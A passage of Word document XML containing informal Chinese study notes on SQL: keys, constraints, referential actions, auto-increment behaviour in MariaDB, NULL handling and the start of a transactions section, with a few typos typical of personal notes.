      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>ALTER TABLE Persons ADD CONSTRAINT pk_PersonID PRIMARY KEY (Id_P,LastName)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>主键外键可以写成一行也可以将定义写于表格的最后面：</w:t>
      </w:r>
      <w:r>
        <w:t>CREATE TABLE student</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>(</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">   sno char(5),</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">   PRIMARY KEY(sno)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>撤销主键：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>MySQL:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">ALTER TABLE Persons </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>DROP PRIMARY KEY</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>SQL Server / Oracle / MS Access:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">ALTER TABLE Persons </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>DROP CONSTRAINT pk_PersonID</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>外键建立：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">FOREIGN KEY </w:t>
      </w:r>
      <w:r>
        <w:t>约束用于预防破坏表之间连接的动作。这就是外键的作用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>CREATE TABLE Orders</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>(</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>O_Id int NOT NULL,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>OrderNo int NOT NULL,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>Id_P int,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>PRIMARY KEY (O_Id),</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">FOREIGN KEY (Id_P) REFERENCES Persons(Id_P) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r>
        <w:t>见过直接</w:t>
      </w:r>
      <w:r>
        <w:t>FOREIGN KEY (Id_P) REFERENCES Persons</w:t>
      </w:r>
      <w:r>
        <w:t>这种就会自动选择一样的字段进行设置。自己的字段连接到别人的主键。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>CREATE TABLE SC(</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t>sno char(5),</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t>cno char(5),</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t>grade int,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">CONSTRAINT PK_sno_cno PRIMARY KEY  (sno,cno),      </w:t>
      </w:r>
      <w:r>
        <w:t>注意这里对约束关系的命名</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">CONSTRAINT FK_sno FOREIGN KEY (sno) REFERENCES student, </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t>CONSTRAINT FK_cno FOREIGN KEY (cno) REFERENCES course</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">CONSTRAINT CK_grade CHECK (grade&gt;=0 and grade &lt;=100)  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>约束的名称可以通过约束名称查找到约束的内容，给约束起个名而已</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t>如果不写约束名也可以</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t>系统会自动帮你生产一个，但删除约束时就挺麻烦的</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t>要查系统表得到自动分配的那个约束名才能删除</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t>暂时定义约束名字：主键表名</w:t>
      </w:r>
      <w:r>
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:t>外键表名。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>在数据库中使用约束</w:t>
      </w:r>
      <w:r>
        <w:t>(constraints)</w:t>
      </w:r>
      <w:r>
        <w:t>是为了在该数据库中实施所谓的</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>业务规则</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>其实就是防止非法信息出现在数据库中</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t>满足管理员和应用开发人员所定义的规则集。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>一般数据库支持五种类型的完整性约束：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t>NOT NULL (</w:t>
      </w:r>
      <w:r>
        <w:t>非空</w:t>
      </w:r>
      <w:r>
        <w:t>)--</w:t>
      </w:r>
      <w:r>
        <w:t>防止</w:t>
      </w:r>
      <w:r>
        <w:t>NULL</w:t>
      </w:r>
      <w:r>
        <w:t>值进入指定的列</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t>在单列基础上定义</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t>默认情况下</w:t>
      </w:r>
      <w:r>
        <w:t>,ORACLE</w:t>
      </w:r>
      <w:r>
        <w:t>允许在任何列中有</w:t>
      </w:r>
      <w:r>
        <w:t>NULL</w:t>
      </w:r>
      <w:r>
        <w:t>值</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t>CHECK (</w:t>
      </w:r>
      <w:r>
        <w:t>检查</w:t>
      </w:r>
      <w:r>
        <w:t>)--</w:t>
      </w:r>
      <w:r>
        <w:t>检查在约束中指定的条件是否得到了满足</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t>UNIQUE (</w:t>
      </w:r>
      <w:r>
        <w:t>唯一</w:t>
      </w:r>
      <w:r>
        <w:t>)--</w:t>
      </w:r>
      <w:r>
        <w:t>保证在指定的列中没有重复值</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t>在该表中每一个值或者每一组值都将是唯一的</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t>PRIMARY KEY (</w:t>
      </w:r>
      <w:r>
        <w:t>主键</w:t>
      </w:r>
      <w:r>
        <w:t>)--</w:t>
      </w:r>
      <w:r>
        <w:t>用来唯一的标识出表的每一行</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t>并且防止出现</w:t>
      </w:r>
      <w:r>
        <w:t>NULL</w:t>
      </w:r>
      <w:r>
        <w:t>值</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t>一个表只能有一个主键约束</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t>POREIGN KEY (</w:t>
      </w:r>
      <w:r>
        <w:t>外部键</w:t>
      </w:r>
      <w:r>
        <w:t>)--</w:t>
      </w:r>
      <w:r>
        <w:t>通过使用公共列在表之间建立一种父子</w:t>
      </w:r>
      <w:r>
        <w:t>(parent-child)</w:t>
      </w:r>
      <w:r>
        <w:t>关系</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t>在表上定义的外部键可以指向主键或者其他表的唯一键</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>违约处理策略（</w:t>
      </w:r>
      <w:r>
        <w:t>action</w:t>
      </w:r>
      <w:r>
        <w:t>）：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>拒绝操作</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (NO ACTION)</w:t>
      </w:r>
      <w:r>
        <w:t>，不允许增删改操作</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>级联操作</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (CASCADE)</w:t>
      </w:r>
      <w:r>
        <w:t>，删除被参照关系元组时，相应删除对应的参照关系的相应元组。修改被参照关系主码值，相应修改对应的参照关系的相应元组。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>置空操作</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (SET NULL)</w:t>
      </w:r>
      <w:r>
        <w:t>，删除被参照关系元组或修改被参照关系主码值时，将对应的参照关系元组的外码值设置为空值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>FOREIGN KEY ( column_name [, ... ] ) REFERENCES reftable [ ( refcolumn [, ...] ) ]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">       [ ON DELETE action ] [ ON UPDATE action]  </w:t>
      </w:r>
      <w:r>
        <w:t>外键指定的时候可以设置</w:t>
      </w:r>
      <w:r>
        <w:t>update</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>delete</w:t>
      </w:r>
      <w:r>
        <w:t>对于数据操作方式是</w:t>
      </w:r>
      <w:r>
        <w:t>NO ACTION</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>CASCADE</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>SET NULL</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">RESTRICT </w:t>
      </w:r>
      <w:r>
        <w:t>受限删除</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>默认</w:t>
      </w:r>
      <w:r>
        <w:t>NO ACTION</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>表：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>并对表格和字段分别进行</w:t>
      </w:r>
      <w:r>
        <w:t>comment</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve"> CREATE TABLE accounts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve"> userId INT(11) PRIMARY KEY   AUTO_INCREMENT,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve"> username CHAR(11) COMMENT 'phone',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve"> password VARCHAR(50) NOT NULL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve"> );</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve"> ALTER TABLE accounts COMMENT = '</w:t>
      </w:r>
      <w:r>
        <w:t>【益</w:t>
      </w:r>
      <w:r>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:t>】用户账户信息</w:t>
      </w:r>
      <w:r>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">Updata </w:t>
      </w:r>
      <w:r>
        <w:t>日常报表</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1 Set </w:t>
      </w:r>
      <w:r>
        <w:t>电流</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = 1.2 where </w:t>
      </w:r>
      <w:r>
        <w:t>时间</w:t>
      </w:r>
      <w:r>
        <w:t>= '2012-5-21'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>顺序查找的次数与建立索引后的查找次数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>在更新的时候，会从</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>日常报表</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1 </w:t>
      </w:r>
      <w:r>
        <w:t>表中查询</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>时间</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>列，由于花有</w:t>
      </w:r>
      <w:r>
        <w:t>110</w:t>
      </w:r>
      <w:r>
        <w:t>万条数据，所以查询指定记录的平均次数是</w:t>
      </w:r>
      <w:r>
        <w:t>55</w:t>
      </w:r>
      <w:r>
        <w:t>万次！更新</w:t>
      </w:r>
      <w:r>
        <w:t>1440</w:t>
      </w:r>
      <w:r>
        <w:t>条数据，就要查询</w:t>
      </w:r>
      <w:r>
        <w:t>7.92</w:t>
      </w:r>
      <w:r>
        <w:t>亿次，所以计算量要</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>分钟左右，很正常。在建立时间主键后，会对时间列进行排序，排序后，采用二分搜索法来查询，这样</w:t>
      </w:r>
      <w:r>
        <w:t>110</w:t>
      </w:r>
      <w:r>
        <w:t>万次最坏查询到的次数为</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Log2(1100,000)=24</w:t>
      </w:r>
      <w:r>
        <w:t>次，即使全按最坏情况考虑，更新</w:t>
      </w:r>
      <w:r>
        <w:t>1440</w:t>
      </w:r>
      <w:r>
        <w:t>条记录大约只需要查询</w:t>
      </w:r>
      <w:r>
        <w:t>3.5</w:t>
      </w:r>
      <w:r>
        <w:t>万次，难怪只用了不到</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>秒。我还以为数据库会有什么更加高深的操作。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>insert into result set username='123',a1=2;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>MariaDB [collage]&gt; insert into ITclass values('1','2','5','3','4','6','7');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>ERROR 1136 (21S01): Column count doesn8't match value count at row 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>MariaDB [collage]&gt; insert into ITclass values(0,'1','2','5','3','4','6','7');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>Query OK, 1 row affected (0.00 sec)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>MariaDB [collage]&gt; insert into ITclass values(0,'1','2','5','3','4','6','7');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>Query OK, 1 row affected (0.00 sec)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">INSERT INTO student VALUES </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">  ('Chun', 'SQL', 75), ('Chun', 'Tuning', 73), </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">  ('Esben', 'SQL', 43), ('Esben', 'Tuning', 31), </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">  ('Kaolin', 'SQL', 56), ('Kaolin', 'Tuning', 88), </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">  ('Tatiana', 'SQL', 87), ('Tatiana', 'Tuning', 83);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>insert into xx values(xx,xxx,NULL,xxx);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>MariaDB [collage]&gt; select * from ITclas;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>ERROR 1146 (42S02): Table 'collage.ITclas' doesn't exist</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>MariaDB [collage]&gt; select * from ITclass;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+----+------+-----------+------+------+--------------+-----------+-----------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>| id | name | use_model | url  | code | introduction | question1 | question2 |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+----+------+-----------+------+------+--------------+-----------+-----------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>|  1 | 1    | 2         | 5    | 3    | 4            | 6         | 7         |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>|  2 | 1    | 2         | 5    | 3    | 4            | 6         | 7         |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+----+------+-----------+------+------+--------------+-----------+-----------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>2 rows in set (0.00 sec)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>后来我把这两条测试数据都删除了结果从</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>开始，根本就不是按照表中已存在的最大项加一来的。这个的自增跳跃问题没有专门的办法解决，只能自己想办法处理，删了重新建立为行号对应关系。不过在</w:t>
      </w:r>
      <w:r>
        <w:t>Mysql2008</w:t>
      </w:r>
      <w:r>
        <w:t>以后，可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>DBCC CHECKIDENT</w:t>
      </w:r>
      <w:r>
        <w:t>命令。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>当然</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>TRUNCATE TABLE ITClass;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>来清空表中所有数据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>包括记录自增数值的全局变量</w:t>
      </w:r>
      <w:r>
        <w:t>，反正是测试数据</w:t>
      </w:r>
      <w:r>
        <w:t>...</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>或者删除索引字段重建</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">ORDER BY </w:t>
      </w:r>
      <w:r>
        <w:t>子句可明确指定结果序。默认为升序</w:t>
      </w:r>
      <w:r>
        <w:t>(ASC)</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>NULL</w:t>
      </w:r>
      <w:r>
        <w:t>值在排序时被当作最大值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>如果取</w:t>
      </w:r>
      <w:r>
        <w:t>“NULL</w:t>
      </w:r>
      <w:r>
        <w:t>值</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>的字段出现在条件表达式中，将使条件计算为</w:t>
      </w:r>
      <w:r>
        <w:t>NULL</w:t>
      </w:r>
      <w:r>
        <w:t>，进而被排除于结果外。也就是说</w:t>
      </w:r>
      <w:r>
        <w:t>xx=2</w:t>
      </w:r>
      <w:r>
        <w:t>的结果会是一个</w:t>
      </w:r>
      <w:r>
        <w:t>NULL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>COUNT(*)</w:t>
      </w:r>
      <w:r>
        <w:t>总是返回记录的个数</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">   COUNT(</w:t>
      </w:r>
      <w:r>
        <w:t>字段</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t>返回指定字段值非空的记录个数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>数据库事务：一个有限的数据库操作序列构成。</w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>维基百科</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>要么全部执行要要么全部不执行，比如说银行转账中涉及到的数据库操作。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>BEGIN TRANSACTION</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>COMMIT</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>ROLLBACK</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>回滚</w:t>
      </w:r>
      <w:r>
        <w:t>(Rollback)</w:t>
      </w:r>
      <w:r>
        <w:t>：撤销指定</w:t>
      </w:r>
      <w:r>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:t>语句的处理过程。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>提交</w:t>
      </w:r>
      <w:r>
        <w:t>(Commit):</w:t>
      </w:r>
      <w:r>
        <w:t>将还未保存的数据库语句写入数据库表。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>保存点</w:t>
      </w:r>
      <w:r>
